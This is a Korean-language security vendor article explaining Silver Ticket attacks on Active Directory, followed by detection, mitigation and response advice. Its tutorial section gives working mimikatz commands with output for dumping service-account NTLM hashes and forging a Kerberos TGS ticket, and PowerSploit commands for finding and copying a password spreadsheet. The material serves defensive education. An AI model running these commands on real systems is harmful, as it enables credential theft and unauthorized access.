Netwrix 1Secure는 데이터와 아이덴티티 전반에 걸쳐 통합된 가시성을 제공합니다 - 14일간 무료로 전체 액세스가 가능합니다.무료 평가판 시작

Silver Ticket 공격

Golden Ticket과 개념이 비슷한 Silver Ticket 공격은 자격 증명을 손상시키고, Kerberos 프로토콜의 설계를 악용하는 것을 포함합니다. 그러나 도메인에 대한 무제한 접근 권한을 공격자에게 제공하는 Golden Ticket과 달리, Silver Ticket은 공격자가 특정 서비스에 대해 티켓 발급 서비스(TGS) 티켓을 위조하도록만 합니다. TGS 티켓은 해당 서비스의 비밀번호 해시로 암호화되므로, 공격자가 서비스 계정의 해시를 탈취하면 그 서비스에 대한 TGS 티켓을 생성(mint)할 수 있습니다. Silver Ticket 공격의 범위는 더 작을 수 있지만, 여전히 공격자의 도구 상자에서 강력한 수단으로, 리소스에 대한 지속적이고 은밀한 접근을 가능하게 합니다. 또한 서비스 계정의 비밀번호 해시만 있으면 되기 때문에 Golden Ticket 공격보다 실행이 훨씬 더 쉽습니다. LSASS.exe에서 해시를 수집하는 방식이나 Kerberoasting 같은 기법은 공격자가 서비스 계정의 비밀번호 해시를 얻는 일반적인 방법입니다.

위협 요약

대상: Active Directory

도구: mimikatz, impacket, PowerSploit

ATT&CK® 전술: 자격 증명 액세스

ATT&CK 기법: T1558.002

난이도

탐지: 어려움

완화: 어려움

대응: 보통

공격 튜토리얼: 실버 티켓 공격이 작동하는 방식

1단계

서비스 계정의 자격 증명을 손상시킵니다

TGS 티켓을 발급(생성)할 수 있는 능력을 얻으려면 공격자는 먼저 서비스 계정의 비밀번호 해시를 손상시켜야 합니다. 이 예에서는 파일 서버를 침해한 공격자가 이제 서비스 계정의 비밀번호 해시를 손상시킵니다:

      PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

mimikatz(commandline) # privilege::debug

Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

# ... output truncated ... #

Authentication Id : 0 ; 29151002 (00000000:01bccf1a)

Session : Interactive from 5

User Name : DWM-5

Domain : Window Manager

Logon Server : (null)

Logon Time : 21/07/2020 10:26:16

SID : S-1-5-90-0-5

msv :

[00000003] Primary

* Username : FileServer1$

* Domain : DOMAIN

* NTLM : 281fd98680ed31a9212256ada413db50

* SHA1 : c8fe518dfa728eb92eb2566328f0123e3bcb2717

# ... output truncated ... #

mimikatz(commandline) # exit

Bye!
      

2단계

Kerberos TGS 티켓 위조

다음과 같은 도구 mimikatz 를 사용해 Silver Tickets를 발급(생성)할 수 있습니다. TGS 티켓을 위조하는 과정은 Golden Tickets를 발급하는 것과 유사하며,

  • /domain — Active Directory 도메인의 완전한 정규화 도메인 이름(FQDN)
  • /sid — Active Directory 도메인의 SID
  • /user — 가장할 사용자 이름(impersonate 대상)
  • /target — 서버의 정규화된 도메인 이름(FQDN)
  • /service — 대상 서비스 이름
  • /rc4 — NTLM/RC4 비밀번호 해시
      PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit

mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt

User : NonExistentUser

Domain : domain.com (DOMAIN)

SID : S-1-5-21-5840559-2756745051-1363507867

User Id : 500

Groups Id : *513 512 520 518 519

ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt

Service : cifs

Target : FileServer1.domain.com

Lifetime : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26

-> Ticket : ** Pass The Ticket **

* PAC generated

* PAC signed

* EncTicketPart generated

* EncTicketPart encrypted

* KrbCred generated

Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session

mimikatz(commandline) # misc::cmd

Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8

mimikatz(commandline) # exit

Bye!
      

STEP 3

위조된 티켓을 사용해 추가 목표를 달성하세요

이전 단계에서 공격자는 실버 티켓을 위조하고 이를 새 cmd.exe 세션에 주입했습니다. 공격자가 발급(생성)한 Silver Ticket은 cifs 서비스를 지정했으며, 이를 통해 공격자는 위조된 TGS를 사용하여 파일 공유에 접근할 수 있습니다. TGS가 위조되었기 때문에, 실제로 도메인에 존재하지 않는 사용자에 대해서도 TGS를 만들 수 있어 대응자가 공격자를 추적하기가 더 어려워집니다.이 예에서는 공격자가 위조된 티켓과 PowerShell 모듈의 Find-InterestingFile cmdlet을 사용해 PowerSploit 파일 공유를 스캔해 민감한 데이터를 찾아내고 이를 유출합니다.

      PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\

FullName : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx

Owner : DOMAIN\JOED

LastAccessTime : 27/07/2020 12:47:44

LastWriteTime : 27/07/2020 12:47:44

CreationTime : 10/04/2011 10:04:50

Length : 76859

PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3"

PS>
      

탐지, 완화 및 대응

탐지

난이도: 어려움

티켓-발급 서비스 티켓(TGS)을 얻는 일반적인 절차는 도메인 컨트롤러에 생성을 요청하는 것입니다. 요청자가 자신의 신원을 증명하면, 도메인 컨트롤러는 서비스 계정 암호로 암호화된 TGS를 응답합니다. 하지만 공격자가 해당 암호를 손상(유출/탈취)해 버렸기 때문에, 도메인 컨트롤러와 통신하지 않고도 TGS 티켓을 발급(생성)할 수 있습니다.따라서 Silver Ticket을 탐지하는 것은 엔드포인트에서만 가능하며, 예를 들어 다음과 같은 조작의 미묘한 징후가 있는지 TGS 티켓을 검사하는 작업이 포함됩니다:

  • 존재하지 않는 사용자 이름
  • 수정된(추가 또는 제거된) 그룹 멤버십
  • 사용자 이름과 ID 불일치
  • 일반적인 암호화 유형보다 약하거나 도메인 최대 수명을 초과하는 티켓 수명(도메인 기본 수명은 10시간, mimikatz 기본값은 10년)

Windows 이벤트 로그에는 Silver Tickets를 탐지하는 데 유용한 몇 가지 감사 이벤트가 있습니다:

이벤트

소스

정보

그룹 멤버십 감사: 이벤트 ID 4627

멤버 컴퓨터

  • 사용자 보안 식별자( SID )
  • 그룹 구성원

로그온 감사 : 이벤트 ID 4624

구성원 컴퓨터

  • 사용자 보안 식별자( SID )
  • 사용자 이름
  • 소스 IP (잠재적으로 손상된 호스트를 나타냄)

완화

난이도: 중간

Silver Tickets는 Kerberos 프로토콜을 악용하므로, 사용 위험을 완전히 제거할 수는 없습니다. 그러나 공격자가 서비스 계정의 비밀번호 해시를 손상시키기 더 어렵게 만들 수 있는 여러 완화 조치가 존재합니다.

  • 서비스 계정에 대해 강력한 비밀번호 위생을 적용하세요. 비밀번호는 무작위로 생성하고 최소 30자 이상으로 설정한 뒤, 정기적으로 변경해야 합니다.
  • PAC Validation를 활성화하세요. 알려진 제한 사항이 있긴 하지만, Silver tickets의 탐지와 예방에 도움이 될 수 있는 상황도 있습니다.
  • 멤버 워크스테이션에서 엔드 유저의 관리자 권한을 제거하고, 통제된 권한 상승 솔루션을 도입하세요.
  • 멤버 워크스테이션과 서버에 대한 관리 접근 권한을 꼭 필요한 수준만으로 최소화하세요.
  • Microsoft LAPS 를 사용하여 로컬 관리자 계정에 대해 강력하고 무작위이며 고유한 비밀번호를 만들고, 이를 정기적으로 자동으로 교체하세요.
  • Kerberoasting에 대해 권장되는 완화 조치를 적용하세요.
  • 사용자가 보안 경계를 넘어 관리 권한을 보유하도록 허용하지 마세요. 예를 들어, 처음에 워크스테이션을 침해한 공격자는 워크스테이션에서 서버 또는 도메인 컨트롤러로 이동하기 위해 권한을 상승할 수 없어야 합니다.

대응

난이도: 중간

Silver Ticket이 탐지되면 다음과 같은 대응 조치를 수행해야 합니다:

  • 사고 대응 프로세스를 활성화하고 사고 대응 팀에 알리십시오.
  • 포렌식 조사 및 제거(박멸)와 복구 활동을 위해 의심되는(관련이 있는) 모든 컴퓨터를 격리하십시오.
  • 침해된 서비스 계정의 비밀번호를 재설정하십시오.

공유하기

Entra ID 애플리케이션 권한 악용—작동 방식과 방어 전략

AdminSDHolder 수정 — 작동 방식과 방어 전략

AS-REP Roasting 공격 — 작동 방식과 방어 전략

Hafnium 공격—작동 방식과 방어 전략

DCSync 공격 해설: Active Directory 보안에 대한 위협

패스-더-해시(PtH) 공격 이해하기

Golden Ticket 공격이란? 작동 방식, 탐지 및 대응(예방)

gMSA 악용 공격과 Golden gMSA 공격 설명

DCShadow 공격 – 작동 방식, 실제 사례 및 방어 전략

ChatGPT 프롬프트 인젝션: 위험 이해, 사례 및 예방

NTDS.dit 추출 공격 이해하기

Kerberoasting 공격 – 작동 원리와 방어 전략

패스-더-티켓(Pass-the-Ticket) 공격 설명: 위험, 예시 및 방어 전략

비밀번호 스프레이 공격 이해하기

평문 비밀번호 추출(Plaintext Password Extraction) 이해하기: 위험, 예시 및 예방

Zerologon 취약점 설명: 위험, 악용 방법 및 대응 방안

랜섬웨어 공격에 대한 완전한 가이드

Skeleton Key 공격: 작동 원리와 탐지 방법

Lateral Movement: 그것이 무엇인지, 작동 방식, 그리고 예방 방법

중간자(MITM) 공격: 무엇인지, 그리고 어떻게 예방할 수 있는가

공격자에게 PowerShell이 특히 인기 있는 이유는 무엇일까요?

4가지 서비스 계정 공격과 이를 방어하는 방법

업무에 악성코드 공격이 영향을 미치지 않도록 예방하는 방법

Credential Stuffing이란 무엇인가요?

PowerUpSQL로 SQL Server 침해하기

마우스재킹 공격이란 무엇이며, 이에 대응하는 방법

Security Support Provider(SSP)를 사용한 자격 증명 탈취

레인보우 테이블 공격: 작동 방식과 방어 방법

비밀번호 공격에 대한 종합적 이해와 이를 막는 방법

LDAP Reconnaissance

Pass-the-Cookie 공격으로 MFA 우회하기

Golden SAML 공격을 위한 완전한 가이드